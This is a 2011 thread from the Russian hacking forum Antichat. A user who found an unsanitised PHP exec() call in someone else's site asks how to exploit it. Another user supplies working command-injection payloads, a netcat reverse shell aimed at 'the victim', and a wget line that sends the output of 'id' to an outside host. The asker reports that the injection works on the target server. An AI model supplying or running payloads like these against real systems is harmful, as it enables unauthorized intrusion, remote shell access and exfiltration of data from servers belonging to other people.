Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   exec без escapeshellarg (https://forum.antichat.xyz/showthread.php?t=296505)

TRUE_GEEK 02.10.2011 21:29
Недавно ковырял один php код и нашел интересную строку:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"grep -i \"[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#DD0000"]\" base.dat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$execAr[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR] 
при этом перемененная search ни где не фильтруется

я попробовал сначала так:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]any search[/COLOR][COLOR="#DD0000"]" base.dat; echo "[/COLOR][COLOR="#0000BB"]unknown error[/COLOR][COLOR="#DD0000"]" > err.log #[/COLOR][/COLOR] 
но err.log не создался

тогда я попробовал так:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]any search[/COLOR][COLOR="#DD0000"]" base.dat; echo "[/COLOR][COLOR="#0000BB"]категрия[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]название[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]single[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]a45cab8f313e7b[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]instock[/COLOR][COLOR="#007700"]|||[/COLOR][COLOR="#0000BB"]описание[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]" #[/COLOR][/COLOR] 
но результат не изменился, хотя если echo выполнилось, то моя строчка должна была попасть execAr и вывестись в результатах поиска

подскажите как юзать, а то я линух только на картинках видел

chekist 02.10.2011 23:43
попробуй так

Код:
Code:
`id>log.txt`

TRUE_GEEK 03.10.2011 19:42
не так не получилось, попробовал `wget http://httpz.ru/nktvzvbkabw.gif?hello+world`, работает, узнал, что это red hat, как мне теперь id переслать ?

chekist 03.10.2011 21:50
тогда понятно, у тебя нет прав на запись в текущую директорию, ищи диру доступную для запись

либо проще

на своём серваке сделай

nc -n -vv -l -p 9999

на жертве

`nc ip_tvoego_serva 9999 -e /bin/sh`

TRUE_GEEK 03.10.2011 23:09
Не подойдет

1 Это вызывается из php, а там стоят таймауты

2 У меня нет дедика

TRUE_GEEK 05.10.2011 18:19
надо вместо в `wget http://httpz.ru/nktvzvbkabw.gif?hello+world` вместо hello world посылать результат выполнения команды

help me people

chekist 05.10.2011 23:43
както так

lol";wget http://httpz.ru/nktvzvbkabw.gif?`id`;echo "

TRUE_GEEK 08.10.2011 17:16
Пасибки)


Время: 15:42